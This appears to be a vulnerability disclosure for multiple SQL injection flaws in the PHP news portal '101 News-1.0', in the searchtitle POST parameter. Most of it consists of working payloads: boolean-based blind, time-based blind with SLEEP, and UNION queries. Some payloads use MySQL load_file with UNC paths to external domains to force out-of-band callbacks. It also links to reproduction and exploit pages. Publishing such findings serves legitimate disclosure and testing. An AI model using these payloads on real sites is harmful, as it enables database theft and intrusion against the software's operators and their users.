## Title: 101 News-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 09/16/2023 ## Vendor: https://mayurik.com/ ## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The searchtitle parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+' was submitted in the searchtitle parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. [+]Payload: ```mysql --- Parameter: searchtitle (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchtitle=814271'+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: searchtitle=814271'+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL# ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0 ## Proof and Exploit: https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html System Administrator - Infrastructure Engineer Penetration Testing Engineer nu11secur1ty <http://nu11secur1ty.com/>